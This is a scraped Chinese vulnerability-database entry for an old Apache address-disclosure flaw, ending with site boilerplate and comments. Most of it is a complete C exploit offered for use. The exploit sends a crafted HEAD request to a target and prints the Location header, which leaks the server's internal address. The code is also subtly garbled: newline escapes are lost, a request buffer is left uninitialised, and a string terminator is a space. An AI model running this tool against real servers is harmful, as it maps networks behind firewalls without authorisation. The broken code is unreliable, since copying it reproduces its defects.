Apache 1.0/1.2/1.3 – Server Address Disclosure
漏洞ID | 1053554 | 漏洞类型 | |
发布时间 | 2001-08-21 | 更新时间 | 2001-08-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Multiple | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/3169/info
A vulnerability has been discovered in Apache web server that may result in the disclosure of the server's address.
The problem occurs when a HTTP request containing the URI of a directory is submitted to the server. If the URI does not contain a trailing '/' character, the server returns a 3xx redirection error code indicating that further action must be taken in order to fulfill the request. When this occurs, a 'Location' response-header containing the address of the server is returned as part of the response.
In a situation where the request is redirected to the server behind a firewall, this could lead to the disclosure of the server's internal network address.
/* Exploit for the Apache Server Address Disclosure Vulnerability
**
** by: magnum
** [email protected]
** http://fuckthat.org
**
** [explanation taken from from http://securityfocus.com/vdb/?id=3169]
**
** A vulnerability has been discovered in Apache web server that may
** result in the disclosure of the server's address.
**
** The problem occurs when a HTTP request containing the URI of a directory
** is submitted to the server. If the URI does not contain a trailing '/'
** character, the server returns a 3xx redirection error code indicating that
** further action must be taken in order to fulfill the request. When this
** occurs, a 'Location' response-header containing the address of the server
** is returned as part of the response.
**
** In a situation where the request is redirected to the server behind a
** firewall, this could lead to the disclosure of the server's internal
** network address.
**
** --SNIP--
**
** As it was put so well in that explanation, an attacker could exploit this
** vulnerability to gain important information that could help you or an
** attacker to eventually compromise a network or server that resides behind
** an ipchains/NAT firewall, routing firewall, or many other different kinds
** of bastion hosts.
**
** Enjoy :)
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/time.h>
#define ERROR -1
#define MAXLEN 400
main(int argc, char *argv[])
{
int sock_fd;
struct sockaddr_in dest_addr;
struct hostent *he;
char buf[1024];
char request[1024];
char *p;
int i;
int jackmove;
if (argc != 4) {
printf("Usage: %s <hostname> <port> <directory>n",argv[0]);
printf("Example(verbose): %s www.linux.org 80 /infon",argv[0]);
printf("Example(specify): %s www.linux.org 80 /info | grep Locationn",argv[0]);
printf("Example(output) : Location: http://127.0.0.3/supersecretshit/n");
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */
printf("Unknown host.n");
exit(1);
}
dest_addr.sin_family = AF_INET;
i = atoi(argv[2]);
dest_addr.sin_port = htons(i);
dest_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_addr.sin_zero), 8);
/* heh, sorry, no error checking */
if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Cannot open socket.n");
exit(1);
}
if(connect(sock_fd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)) == -1) {
printf("Could not connect to socket.n");
exit(1);
}
printf("Disclose - Exploit for the Apache Server Address Disclosure Vulnerabilityn");
printf("by: magnum - [email protected] - http://www.fuckthat.orgnn");
strcat(request,"HEAD ");
strcat(request,argv[3]);
strcat(request," HTTP/1.0nnn");
sleep(1);
send(sock_fd, request, strlen(request), 0);
printf("Status: ");
if((jackmove=recv(sock_fd, buf, MAXLEN, 0)) == ERROR) {
printf("recv errorn");
close(sock_fd);
exit(1);
}
printf("Done.n");
buf[jackmove] = ' ';
p=strstr(buf, "Location");
printf("%sn", p);
close(sock_fd);
exit(0);
}
相关推荐: Sun HotJava Browser Arbitrary DOM Access Vulnerability
Sun HotJava Browser Arbitrary DOM Access Vulnerability 漏洞ID 1103717 漏洞类型 Boundary Condition Error 发布时间 2000-10-25 更新时间 2000-10-25 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666